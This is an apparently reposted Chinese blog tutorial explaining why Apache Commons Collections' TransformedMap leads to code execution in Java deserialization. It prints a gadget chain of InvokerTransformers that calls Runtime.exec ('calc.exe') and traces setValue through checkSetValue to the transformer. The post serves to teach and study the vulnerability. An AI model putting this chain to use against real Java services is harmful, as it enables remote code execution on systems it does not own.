溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

java反序列化 - transformedMap類可以執(zhí)行惡意代碼的原理

發(fā)布時(shí)間:2020-07-08 23:08:06 來源:網(wǎng)絡(luò) 閱讀:1574 作者:wx5b0b88843cb2a 欄目:安全技術(shù)

java反序列化 - transformedMap類可以執(zhí)行惡意代碼的原理

0x00 代碼

Map map=new HashMap();
         map.put("key","value");
         //調(diào)用目標(biāo)對象的toString方法
         String command="calc.exe";
         final String[] execArgs = new String[] { command };
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod", new Class[] {
                         String.class, Class[].class }, new Object[] {
                         "getRuntime", new Class[0] }),
                 new InvokerTransformer("invoke", new Class[] {
                         Object.class, Object[].class }, new Object[] {
                         null, new Object[0] }),
                 new InvokerTransformer("exec",
                         new Class[] { String.class }, execArgs)
         };
         Transformer transformer=new ChainedTransformer(transformers);
         Map<String, Object> transformedMap=TransformedMap.decorate(map,null,transformer);

         for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

執(zhí)行結(jié)果:
java反序列化 - transformedMap類可以執(zhí)行惡意代碼的原理

0x01 transformedMap類為什么可以執(zhí)行惡意代碼?

通過上一篇https://blog.51cto.com/13770310/2160737文章, 可知ChainedTransformer的transformer方法可以執(zhí)行惡意代碼。
上述代碼的關(guān)鍵是:

         for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

為什么執(zhí)行了 entry.setValue("anything");就可以造成惡意代碼執(zhí)行呢?接下來我們看transformedMap類的checkSetValue方法:


    /**
     * Override to transform the value when using <code>setValue</code>.
     * 
     * @param value  the value to transform
     * @return the transformed value
     * @since Commons Collections 3.1
     */
    protected Object checkSetValue(Object value) {
        return valueTransformer.transform(value);
    }

當(dāng)transformedMap對象執(zhí)行setValue方法時(shí)會調(diào)用valueTransformer的transform方法,如果傳入的valueTransformer是ChainedTransformer的對象,那不就可以造成惡意代碼執(zhí)行了嗎。
接著查看上面代碼:
java反序列化 - transformedMap類可以執(zhí)行惡意代碼的原理
因此該代碼的核心還是使用的ChainedTransformer的transformer方法

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI